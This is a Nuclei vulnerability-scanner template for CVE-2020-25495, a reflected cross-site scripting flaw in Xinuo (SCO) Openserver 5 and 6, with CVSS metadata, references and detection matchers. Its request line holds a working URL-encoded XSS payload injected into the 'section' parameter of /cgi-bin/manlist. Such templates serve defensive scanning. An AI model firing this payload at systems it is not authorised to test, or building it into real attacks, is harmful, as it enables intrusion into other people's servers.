nuclei-templates/cves/2020/CVE-2020-25495.yaml

42 lines
1.3 KiB
YAML

id: CVE-2020-25495
info:
name: Xinuo Openserver 5/6 - Cross-Site scripting
author: 0x_Akoko
severity: medium
description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting.
reference:
- https://www.exploit-db.com/exploits/49300
- https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability
- http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-25495
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-25495
cwe-id: CWE-79
tags: cve,cve2020,sco,xss,edb,packetstorm
requests:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/14